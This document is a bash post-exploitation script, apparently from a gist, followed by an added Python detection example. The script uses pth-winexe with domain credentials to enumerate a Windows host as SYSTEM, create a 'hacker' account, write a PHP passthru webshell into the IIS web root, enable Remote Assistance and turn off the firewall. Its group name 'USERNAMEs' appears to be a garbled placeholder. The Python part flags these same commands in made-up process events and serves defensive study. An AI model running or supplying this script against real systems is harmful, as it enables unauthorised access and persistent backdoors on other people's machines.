A Windows post exploitation shell script

```bash
#!/bin/bash
TARGET=$1
# Host and domain enumeration, run as SYSTEM over pth-winexe
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "systeminfo"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "whoami /all"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "ipconfig /all"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "netstat -ano"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net accounts"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net localgroup USERNAMEs"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net share"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net view"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "powershell.exe -command Get-Hotfix"
# Changes that persist on the host: a new local account and group membership,
# a file written under the IIS web root, a Remote Assistance registry value,
# and the host firewall switched off
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net user hacker PASSWORD /add"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net localgroup USERNAMEs /add hacker"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net group 'Domain Admins' /domain"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "echo ^< ?php echo passthru($_GET['cmd']); ?^> > C:\inetpub\wwwroot\backdoor.php"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fAllowToGetHelp /t REG_DWORD /d 1 /f"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "netsh firewall set opmode disable"
```
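Detection logic for the host-side changes this script makes, as an added example that is not part of the gist: it runs over constructed process-creation events and flags account creation, group membership changes, the Remote Assistance registry value, the firewall being disabled, a PHP file with a command-execution call written under the IIS web root, and a burst of enumeration commands spawned by the winexe service process. The event layout, the hostnames and the parent process name winexesvc.exe are assumptions for the example.

```python
import re
from collections import defaultdict

# Constructed process-creation events (Security 4688 / Sysmon Event 1 style), one per
# line. Made-up telemetry for this example, not real logs. Assumption: winexe-style
# remote execution appears as children of the winexesvc.exe service process.
SAMPLE_EVENTS = [
    'host=WS01 user=SYSTEM parent=winexesvc.exe cmd="systeminfo"',
    'host=WS01 user=SYSTEM parent=winexesvc.exe cmd="whoami /all"',
    'host=WS01 user=SYSTEM parent=winexesvc.exe cmd="netstat -ano"',
    'host=WS01 user=SYSTEM parent=winexesvc.exe cmd="net user hacker Passw0rd /add"',
    'host=WS01 user=SYSTEM parent=winexesvc.exe cmd="net localgroup users /add hacker"',
    'host=WS01 user=SYSTEM parent=winexesvc.exe cmd="echo <?php passthru($_GET[cmd]); ?> > C:\\inetpub\\wwwroot\\b.php"',
    'host=WS01 user=SYSTEM parent=winexesvc.exe cmd="reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server /v fAllowToGetHelp /t REG_DWORD /d 1 /f"',
    'host=WS01 user=SYSTEM parent=winexesvc.exe cmd="netsh firewall set opmode disable"',
    'host=WS02 user=alice parent=explorer.exe cmd="net user"',  # benign: lists accounts only
]

EVENT_RE = re.compile(r'host=(?P<host>\S+) user=(?P<user>\S+) parent=(?P<parent>\S+) cmd="(?P<cmd>.*)"')

# Rules keyed to the state changes the script makes; each matches the process command line.
RULES = {name: re.compile(rx, re.IGNORECASE) for name, rx in {
    "local_account_created": r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b",
    "local_group_member_added": r"\bnet1?(?:\.exe)?\s+localgroup\s+.*/add\b",
    "remote_assistance_enabled": r"\breg(?:\.exe)?\s+add\b.*Terminal Server.*fAllowToGetHelp.*/d\s+1\b",
    "firewall_disabled": r"\bnetsh(?:\.exe)?\s+(?:firewall\s+set\s+opmode\s+disable|advfirewall\s+set\s+\w+\s+state\s+off)\b",
    "webshell_written_to_webroot": r"(?=.*(?:passthru|shell_exec|\$_(?:GET|POST|REQUEST)\[)).*>\s*\S*inetpub\\wwwroot\\\S+",
}.items()}

# Read-only enumeration commands; several of them in a row from the remote-exec service is the
# recon phase of the script, even though no single one is suspicious on its own.
RECON = ("systeminfo", "whoami", "ipconfig", "netstat", "net accounts", "net share", "net view", "get-hotfix")

def scan(events):
    """Return (host, rule, detail) findings for the events, including a per-host recon burst."""
    findings, recon_hits = [], defaultdict(set)
    for line in events:
        m = EVENT_RE.match(line)
        if not m:
            continue
        host, parent, cmd = m["host"], m["parent"].lower(), m["cmd"]
        findings += [(host, name, cmd) for name, rx in RULES.items() if rx.search(cmd)]
        if parent == "winexesvc.exe":
            recon_hits[host].update(k for k in RECON if k in cmd.lower())
    for host, hits in recon_hits.items():
        if len(hits) >= 3:
            findings.append((host, "recon_burst_via_winexe", ", ".join(sorted(hits))))
    return findings
```

Calling `scan(SAMPLE_EVENTS)` yields six findings, all on WS01, and nothing for the benign `net user` listing on WS02.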